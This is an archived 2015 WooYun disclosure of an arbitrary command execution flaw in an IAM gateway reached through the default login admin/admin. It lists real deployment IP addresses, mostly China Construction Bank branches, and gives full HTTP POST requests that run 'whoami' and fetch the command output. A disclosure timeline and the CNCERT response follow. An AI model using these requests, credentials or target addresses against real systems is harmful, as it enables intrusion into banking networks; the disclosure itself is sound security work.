当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098926

漏洞标题:IAM网关任意命令执行(案例中建设银行使用够多)

相关厂商:上海安达通信息安全技术股份有限公司

漏洞作者: YY-2012

提交时间:2015-03-01 14:31

修复时间:2015-06-01 15:18

公开时间:2015-06-01 15:18

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-01: 细节已通知厂商并且等待厂商处理中
2015-03-03: 厂商已经确认,细节仅向厂商公开
2015-03-06: 细节向第三方安全合作伙伴开放
2015-04-27: 细节向核心白帽子及相关领域专家公开
2015-05-07: 细节向普通白帽子公开
2015-05-17: 细节向实习白帽子公开
2015-06-01: 细节向公众公开

简要描述:

IAM网关任意命令执行(案例中建设银行使用够多)

详细说明:

http://221.181.248.2:8081/授权用户:淮安建设银行
http://112.24.101.142:8081/授权用户:建设银行江苏省分行
http://221.181.161.122:8081/授权用户:建设银行江苏省分行
http://221.131.71.210:8081/授权用户:中国移动通信集团江苏有限公司镇江分公司
http://112.21.184.154:8081/授权用户:常州建设银行
http://223.68.222.20:8081/授权用户:建设银行江苏省分行


以上获取的信息均来自网关使用的弱口令admin/admin
同时发现登录后可执行任意系统命令。。

漏洞证明:

z1.jpg


z2.jpg


z3.jpg


z4.jpg


z5.jpg


z6.jpg


POST /sys/sysser/execCommand HTTP/1.1
Host: 112.24.101.142:8081
Proxy-Connection: keep-alive
Content-Length: 20
Accept: application/json, text/javascript, */*
Origin: http://112.24.101.142:8081
X-Requested-With: XMLHttpRequest
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00
Content-Type: application/x-www-form-urlencoded
Referer: http://112.24.101.142:8081/page/system/status.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=登录后的cookie; username=; password=; myc=
addr=&command=whoami


执行任意命令

POST /sys/sysser/traceroute HTTP/1.1
Host: 112.24.101.142:8081
Proxy-Connection: keep-alive
Content-Length: 8
Accept: application/json, text/javascript, */*
Origin: http://112.24.101.142:8081
X-Requested-With: XMLHttpRequest
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00
Content-Type: application/x-www-form-urlencoded
Referer: http://112.24.101.142:8081/page/system/commandTool.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=登录后的cookie; username=; password=; myc=
command=


获取之前执行命令的结果

a1.jpg


a2.jpg


a3.jpg


a4.jpg

修复方案:

联系厂商

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-03 15:16

厂商回复:

CNVD未直接复现,转厂商确认。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-02 18:09 | cncert国家互联网应急中心(乌云厂商)

    您好:感谢您对CNVD的支持,您上报的漏洞案例中建设银行使用具多,请协助CNVD提供下怎么找到的案例,以文档的形式邮件vreport@cert.org.cn邮箱,以便CNVD验证和复现。祝好!

  2. 2015-03-02 18:17 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    @cncert国家互联网应急中心 以回复邮件。